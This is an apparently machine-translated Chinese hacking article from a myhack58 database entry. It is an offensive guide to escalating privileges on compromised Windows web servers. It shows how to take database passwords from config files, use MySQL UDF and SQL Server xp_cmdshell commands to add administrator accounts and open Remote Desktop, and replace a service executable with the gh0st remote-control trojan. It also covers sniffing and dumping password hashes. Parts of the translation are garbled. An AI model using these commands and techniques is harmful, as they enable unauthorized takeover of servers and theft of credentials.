The multi-mode Server-bug warning-the black bar safety net

2010-05-04T00:00:00
ID MYHACK58:62201026841
Type myhack58
Reporter 佚名
Modified 2010-05-04T00:00:00

Description

  1. Find the configuration file, read the web site directory under the config. asp config.php conn. asp inc directory find a high-privilege account and password For example: the root password SA password.

// [CH] the following variables, according to the space provided of the account parameters to modify,if you have any questions,please contact Server provider

$dbhost = 'localhost'; // Database server

$dbuser = 'root'; // Database user name

$dbpw = '1 2 3'; // Database password

$dbname = 'discuz'; // Database name

$pconnect = 0; // Database persistent connection 0=OFF, 1=playing

Give the root account a password: root 1 2 3

The use of the MySQL root mention the right to

DLL 已 成功 的 导出 到 c:\\windows\\system32\\mysqlDll_1269695183.dll Function 'state' already exists

select the state("net user yhsafe yhsafe /add")

The SQL statement executed successfully:Resource id #2

Array ( [0] => command completed successfully.

succeed!

[state("net user yhsafe yhsafe /add")] => command completed successfully.

succeed!

)

The use of SA to provide the right

server=localhost;UID=saWD=1 2 3;database=masterrovider=SQLOLEDB

Execute xp_cmdshell, if not, remember to restore the xp_cmdshell

Exec master. dbo. xp_cmdshell 'net user yhsafe.com yhsafe /add' Exec master. dbo. xp_cmdshell 'net localgroup administrators yhsafe.com /add'

Open 3 3 8 9: The Exec master. dbo. xp_cmdshell 'C:\inetpub\wwwroot\bbs\3389.exe 3 3 8 9'

Return results: Now opening terminate service...success! 5.2 OK...

Open success

  1. Use some of the software configuration vulnerability, or the local overflow to be provided to the right.

"Brazilian barbecue"to mention the rights:

webshell is performed under ch.exe "net user 1 2 3 1 2 3 /add"

3 6 0 mention of rights:

360.exe 3 3 8 9 //This would open a Remote Desktop

Press 5 shift on the pop-up CMD

  1. Replacement service law

C:\ftp\FtpServer.exe

对 FtpServer.exe renamed to FtpServer1.exe

Upload a bounce of the remote control program. For example, gh0st

gh0st 重 命名 为 FtpServer.exe

  1. Break the routine with a webshell to sniffer

Can sniffer to the entire server FTP HTTP this password.

Need to use Wireshark professional tools to view the password.

  1. dump password

dump need administrator or even system permissions

dump out the hash and thus the internal network to penetrate further